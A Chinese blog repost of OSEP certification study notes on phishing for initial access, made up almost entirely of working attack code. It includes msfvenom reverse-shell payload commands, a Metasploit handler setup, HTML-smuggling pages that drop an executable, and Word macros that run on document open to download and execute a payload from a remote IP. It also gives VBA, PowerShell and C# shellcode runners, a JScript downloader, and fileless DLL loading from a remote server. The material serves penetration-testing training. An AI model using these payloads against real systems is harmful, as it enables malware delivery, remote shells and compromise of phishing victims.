OSEP | 钓鱼攻击

admin 2024年7月23日10:01:15评论39 views字数 18208阅读60分41秒阅读模式

关于笔记形式和学习方法请看OSEP学习之路 | 开篇

本篇是第一部分“钓鱼攻击”技术,笔记基本是按照教材梳理的,章节不是一一对应,因为有些内容合并后更好理解

OSEP | 钓鱼攻击

和同学想的钓鱼技术还不太一样,教材里的这些严格来说算是钓鱼前准备工作,总结干货如下:

1-钓鱼技术

主要内容:以社工方式获取系统权限的攻击思路和方法

主要方法:以VBA(Word宏)、JS(Windows Script Host)两种方式执行payload获取shell

1.1-远程代码执行payloads

使用msf生成payloads

查看payloads列表

msfvenom -l

1.1.1-Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

1.1.2-Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

1.1.3-Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

1.1.4-PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.phpcat shell.php | pbcopy && echo '<?php ’ | tr -d ‘n’ > shell.php && pbpaste >> shell.php

1.1.5-ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

1.1.6-JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

1.1.7-WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

1.1.8-Python

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

1.1.9-Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

1.1.10-Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

1.1.11-Linux Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

1.1.12-Windows Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

1.1.13-Mac Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

1.2-接收shell

使用MSF填写payload参数进行shell的接受和管理

use exploit/multi/handlerset PAYLOAD <Payload name>set LHOST <LHOST value>set LPORT <LPORT value>set ExitOnSession falseexploit -j -z

1.3-HTML走私

直接下载

<html><body><a href="/msfstaged.exe" download="msfstaged.exe">DownloadMe</a></body></html>

改进

<html>    <head>        <title>html smuggling 1</title>    </head>    <body>        <script>            function base64ToArrayBuffer(base64){                var binary_string = window.atob(base64);                var len = binary_string.length;                var bytes = new Uint8Array(len);                for(var i = 0; i< len; i ++){ bytes[i] = binary_string.charCodeAt(i);}                return bytes.buffer;            }

            var file = 'TVqQAAM...';            var data = base64ToArrayBuffer(file);            var blob = new Blob([data], {type: 'octet/stream'});            var fileaName = 'msfstaged.exe';

            var a = document.createElement('a');            document.body.appendChild(a);            a.style = 'display: none';            var url = window.URL.createObjectURL(blob);            a.href = url;            a.download = fileaName;            a.click();            window.URL.revokeObjectURL(url);</script>    </body> </html>

继续改进

<!DOCTYPE html><html>    <head>        <title>html smuggling 2</title>    </head>    <body>        <h1>Example 2</h1>        <script>            function base64ToArrayBuffer(base64){                var binary_string = window.atob(base64);                var len = binary_string.length;                var bytes = new Uint8Array(len);                for(var i = 0; i< len; i ++){ bytes[i] = binary_string.charCodeAt(i);}                return bytes.buffer;            }

            var file = "TVqQAAMAAAAEAAA...";



            var data = base64ToArrayBuffer(file);            var blob = new Blob([data], {type: 'octet/stream'});

            var filename = 'msfstaged.exe';            navigator.msSaveBlob(blob, filename);</script>    </body></html>

1.4-Office钓鱼

VB宏代码

Sub MyMacro1()

    Dim myLong As Long     myLong = 1    If myLong < 5 Then        MsgBox ("True")    Else     MsgBox ("False")    End If

End Sub

Sub MyMacro2()    Dim str As String    str = "cmd.exe"    Shell str, vbHideEnd Sub

Sub Document_Open()    MyMacro2End Sub

Sub AutoOpen()    MyMacro2End Sub

Sub MyMacro3()    Dim str As String    str = "cmd.exe"    Shell str, vbHideEnd Sub

Sub MyMacro4()    Dim str As String    str = "cmd.exe"    CreateObject("Wscript.Shell").Run str, 0End Sub

执行powershell和延迟执行

Sub MyMacro3()    Dim str As String    str = "powershell IWR -uri http://192.168.203.214/msfstaged.exe -outfile msfstaged.exe"    Shell str, vbHide    Dim exePath As String    exePath = ActiveDocument.Path + ".msfstaged.exe"    Wait (2)    Shell exePath, vbHide
End Sub

Sub Wait(n As Long)    Dim t As Date    t = Now    Do        DoEvents    Loop Until Now >= DateAdd("s", n, t)
End Sub

1.5-VB中使用win32 API

生成shellcode

msfvenom -p windows/meterpreter/reverse_https lhost=<IP> lport=<PORT> exitfunc=thread -f vbapplication

注意shellcode的位数(32位)

Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr 
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr 
Sub myMacro()    Dim buf As Variant    Dim addr As LongPtr    Dim data As Long

    buf = Array(...)
    addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
    For counter = LBound(buf) To UBound(buf)        data = buf(counter)        res = RtlMoveMemory(addr + counter, data, 1)    Next counter
    res = CreateThread(0, 0, addr, 0, 0, 0)


End Sub

1.6-Phishing Pretext

代码

Sub Document_Open()    SubPageEnd Sub

Sub AutoOpen()    SubPageEnd Sub

Sub SubPage()    ActiveDocument.Content.Select    Selection.Delete    ActiveDocument.AttachedTemplate.AutoTextEntries("TheDoc").Insert Where:=Selection.Range, RichText:=TrueEnd Sub

C#调用win32 api,用MessageBox测试

$User32 = @"using System;using System.Runtime.InteropServices;

public class User32{    [DllImport("user32.dll", SetLastError = true, CharSet= CharSet.Auto)]    public static extern int MessageBox(int hWnd, String text, String caption, uint type);
}"@

Add-Type $User32

[User32]::MessageBox(0, "Test", "BoxTitle",0)

准备shellcode

msfvenom -p windows/meterpreter/reverse_https LHOST=<IP> LPORT=443 EXITFUNC=thread -f ps1

组装脚本

$Kernel32 = @"using System;using System.Runtime.InteropServices;

public class Kernel32{    [DllImport("kernel32")]    public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
    [DllImport("kernel32", CharSet = CharSet.Ansi)]    public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
    [DllImport("kernel32.dll", SetLastError=true)]    public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

}"@



Add-Type $Kernel32

[Byte[]] $buf = ...

$size = $buf.Length

[IntPtr]$addr = [Kernel32]::VirtualAlloc(0,$size, 0x3000,0x40);

[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $size)

$thandle = [Kernel32]::CreateThread(0, 0, $addr, 0, 0, 0);

[Kernel32]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")

1.7-在pwoershell中动态调用

[appdomain]::currentdomain.getassemblies() | Sort-Object -Property fullname | Format-Table fullname

以下三步:

 1 - Find GetModuleHandler 2 - Load target dll 3 - Invoke target function

1.7.1-GetProcAddress

# Load system.dll

$systemdll = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') })

# Locate all the unsafe methods$unsafeObj = $systemdll.GetType('Microsoft.Win32.UnsafeNativeMethods')

# find GetModuleHandler$GetModuleHandle = $unsafeObj.GetMethod('GetModuleHandle')

# Use GetModuleHandler to load a dll, user32.dll$GetModuleHandle.Invoke($null, @("user32.dll"))

# find GetProcAddress$GetProcAddress =  $unsafeObj.GetMethod('GetProcAddress')

# We have two candidate, we put them into a list and check each one.

$tmp=@()$unsafeObj.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}

# We just use the first one.

$GetProcAddress = $tmp[0]

$user32 = $GetModuleHandle.Invoke($null, @("user32.dll"))$GetProcAddress.Invoke($null, @($user32, "MessageBoxA"))

代码组合

function LookupFunc {

    Param ($moduleName, $functionName)

    $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |    Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $tmp=@()
    $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}

    return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,@($moduleName)), $functionName))}

$MessageBoxA =  LookupFunc user32.dll MessageBoxA$MessageBoxA

1.7.2-GetDelegateType

$MyAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')

# Get current domain$Domain = [AppDomain]::CurrentDomain

# Define as DynamicAssembly, avoid saving to disk# Provide Run argument, to set it as executable.$MyAssemblyBuilder = $Domain.DefineDynamicAssembly($MyAssembly,[System.Reflection.Emit.AssemblyBuilderAccess]::Run)

# Create the content# Create a InMomoryModule and not include symbols$MyModuleBuilder = $MyAssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)

# Use DefineType to define a delegateType# class (so we can later instantiate it), public, non-extendable, and use ASCII instead of Unicode$MyTypeBuilder = $MyModuleBuilder.DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])

# Then put function prototype inside this DefineType# param1: MethodAttributes, 'RTSpecialName, HideBySig, Public',  make it public and require it to be referenced by both name and signature# param2: Calling conventions, here use standard# param3: arguments for MessageBoxA

$MyConstructorBuilder = $MyTypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, @([IntPtr], [String], [String], [int]))

# SetImplementationFlags, choose Runtime and  mangled$MyConstructorBuilder.SetImplementationFlags('Runtime, Managed')

# Then we want to invoke the function, we should define the settings for a function# param1: # choose Public to make it accessible, HideBySig to allow it to be called by both name and signature# NewSlot, and Virtual to indicate that the method is virtual and ensure that it always gets a new slot in the vtable# param2: return type for the function # param3: array of argument types

$MyMethodBuilder = $MyTypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', [int], @([IntPtr],[String], [String], [int]))

# SetImplementationFlags for methods as well, choose Runtime and  mangled$MyMethodBuilder.SetImplementationFlags('Runtime, Managed')

# Finally Create type

MyDelegateType = $MyTypeBuilder.CreateType()

$MyFunction = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MessageBoxA, $MyDelegateType)

$MyFunction.Invoke([IntPtr]::Zero,"Hello World","This is My MessageBox",0)

1.7.3-代码组合

function getDelegateType{    Param(        [Parameter(Position = 0, Mandatory = $true)] [Type[]] $func,        [Parameter(Position = 1)][Type] $delType = [Void]        )

        $type = [AppDomain]::CurrentDomain.        DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).        DefineDynamicModule('InMemoryModule', $false).        DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate])

        $type.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $func).        SetImplementationFlags('Runtime, Managed')

        $type.DefineMethod('Invoke','Public, HideBySig, NewSlot, Virtual', $delType, $func).        SetImplementationFlags('Runtime, Managed')

        return $type.CreateType()}

1.7.4-最终代码

 

function LookupFunc{    Param ($moduleName, $functionName)

    $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |     Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].            Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')    $tmp=@()    $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress"){$tmp+=$_}}    return $tmp[0].Invoke($null,@(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName))

}

function getDelegateType{    Param(        [Parameter(Position = 0, Mandatory = $true)] [Type[]] $func,        [Parameter(Position = 1)][Type] $delType = [Void]        )

        $type = [AppDomain]::CurrentDomain.        DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).        DefineDynamicModule('InMemoryModule', $false).        DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate])

        $type.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $func).        SetImplementationFlags('Runtime, Managed')

        $type.DefineMethod('Invoke','Public, HideBySig, NewSlot, Virtual', $delType, $func).        SetImplementationFlags('Runtime, Managed')

        return $type.CreateType()}

$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc), (getDelegateType @([IntPtr],[UInt32],[UInt32],[UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000,0x3000,0x40)

[Byte[]] $buf = ...[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length)

$hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread), (getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)

$hThread

[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WaitForSingleObject), (getDelegateType @([IntPtr], [Int32])([IntPtr]))).Invoke($hThread, 0xFFFFFFFF)

1.8-使用HTA钓鱼

HTA代码

<html><head><script language="JScript">var shell = new ActiveXObject("WScript.Shell"); var res = shell.Run("cmd.exe"); </script> </head> 

<body><script language="JScript">self.close();</script></body></html>

1.9-使用WSH钓鱼

需要对多种文件格式进行测试,需要注意的是,哪些后缀是默认有配置对应的打开程序的,比如JSE

1.10-使用JS钓鱼

生成payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.203.214 LPORT=9000 -f exe > met.exe

js代码

var url = "http://192.168.203.214/met.exe"var Objects = WScript.CreateObject('MSXML2.XMLHTTP');Objects.Open('GET', url, false);Objects.Send();

if (Objects.Status == 200){    var Stream = WScript.CreateObject('ADODB.Stream');

    Stream.Open();    Stream.Type = 1;    Stream.Write(Objects.ResponseBody);    Stream.Position = 0;

    Stream.SaveToFile("met.exe", 2);    Stream.Close();}

var r = new ActiveXObject("WScript.shell").Run("met.exe");

双击即可执行,也可以通过命令执行

c:windowssystem32mshta.exe xx.js

1.11将.NET binary转换成JS文件

使用工具:

https://github.com/tyranid/DotNetToJScript

DotNetToJScript命令

DotNetToJScript.exe ExampleAssembly.dll --lang=Jscript --ver=v4 -o demo.js

1.12-.NET调用win32api实现反向shell

Messagebox测试

using System;using System.Collections.Generic;using System.Linq;using System.Text;using System.Threading.Tasks;using System.Diagnostics;using System.Runtime.InteropServices;



namespace ConsoleApp1{    class Program    {        [DllImport("user32.dll", CharSet=CharSet.Auto)]        public static extern int MessageBox(IntPtr hWnd, String text, String caption, int options);
        static void Main(string[] args)        {            MessageBox(IntPtr.Zero, "This is my text", "This is my caption", 0);        }    }}

PInvoke

https://www.pinvoke.net/

生成shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.203.214 lport=9000 -f csharp

执行shellcode的代码

 

using System;using System.Collections.Generic;using System.Linq;using System.Text;using System.Threading.Tasks;using System.Diagnostics;using System.Runtime.InteropServices;

namespace ShellcodeRunner{    class Program    {

        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

        [DllImport("kernel32.dll")]        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        [DllImport("kernel32.dll")]        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);        static void Main(string[] args)        {            // Console.WriteLine("START!");            byte[] buf = new byte[510] { ... };

            int size = buf.Length;

            IntPtr addr = VirtualAlloc(IntPtr.Zero, (UInt32)size, 0x3000, 0x40);            Marshal.Copy(buf, 0, addr, size);            IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);            // Console.WriteLine(hThread);            WaitForSingleObject(hThread, 0xFFFFFFFF);            // Console.WriteLine("END!");        }    }}

使用WaitForSingleObject,因为我们创建新进程后,那么原来的进程主进程怎么办,所以我让他等待我的新进程结束

将上述代码加入js中

DotNetToJScript.exe ExampleAssembly.dll --lang=Jscript --ver=v4 -o runner.js

1.13-其他方法-SharpShooter

工具:

https://github.com/mdsecactivebreach/SharpShooter

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.203.214 lport=443 -f raw -o shell.txtpython2 SharpShooter.py --payload js --dotnetver 4 --stageless --rawscfile ./shell.txt --output test

1.14-使用Powershell加载DLL

生成shellcode

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.203.214 lport=443 -f csharp

编译DLL

 

using System;using System.Collections.Generic;using System.Linq;using System.Text;using System.Threading.Tasks;using System.Diagnostics;using System.Runtime.InteropServices;

namespace ClassLibrary1{    public class Class1    {        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize,        uint flAllocationType, uint flProtect);        [DllImport("kernel32.dll")]        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize,        IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr        lpThreadId);        [DllImport("kernel32.dll")]        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);        public static void runner()        {            byte[] buf = new byte[510] {...};

            int size = buf.Length;

            IntPtr addr = VirtualAlloc(IntPtr.Zero, (UInt32)size, 0x3000, 0x40);            Marshal.Copy(buf, 0, addr, size);            IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);            WaitForSingleObject(hThread, 0xFFFFFFFF);        }    }

}

powershell加载DLL

(New-Object System.Net.WebClient).DownloadFile('http://<IP>/ClassLibrary1.dll','ClassLibrary1.dll')$assem = [System.Reflection.Assembly]::LoadFile("c:usersadminClassLibrary1.dll")$class = $assem.getType("ClassLibrary1.Class1")$method = $class.GetMethod("runner")$method.Invoke(0, $null)

无文件加载DLL

$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.43.140:9999/ClassLibrary1.dll')$assem = [System.Reflection.Assembly]::Load($data)$class = $assem.GetType("ClassLibrary1.Class1")$method = $class.GetMethod("runner")$method.Invoke(0, $null)

远程加载

$assem = [System.Reflection.Assembly]::LoadFile("\192.168.203.128shareClassLibrary1.dll")$class = $assem.getType("ClassLibrary1.Class1")$method = $class.GetMethod("runner")$method.Invoke(0, $null)

2-其他技巧

2.1-开启SMB共享

在kali上操作:

/etc/samba/smb.conf

[share]path = /home/kali/OSEP/smbsharebrowseable = yesread only = no

增加用户变更密码

smbpasswd -a kali

使用impacket

smbserver.py share . -smb2support

2.2-安装Visual Studio

安装好后,测试编译如下代码

using System;using System.Collections.Generic;using System.Linq;using System.Text;using System.Threading.Tasks;

namespace Hello_World{    internal class Program    {        static void Main(string[] args)        {            Console.WriteLine("Hello World");        }    }}

2.3-代理Proxy

New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null

$keys = Get-ChildItem 'HKU:' ForEach ($key in $keys) {if ($key.Name -like "*S-1-5-21-*") {$start = $key.Name.substring(10);break}} 

$proxyAddr=(Get-ItemProperty -Path "HKU:$startSoftwareMicrosoftWindowsCurrentVersionInternet Settings").ProxyServer 

[system.net.webrequest]::DefaultWebProxy = new-object System.Net.WebProxy("http://$proxyAddr") 

$wc = new-object system.net.WebClient 

$wc.DownloadString("http://192.168.119.120/run2.ps1")

坚持自律做最好的自己

原文始发于微信公众号(高级红队专家):OSEP | 钓鱼攻击

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月23日10:01:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSEP | 钓鱼攻击https://cn-sec.com/archives/2988195.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息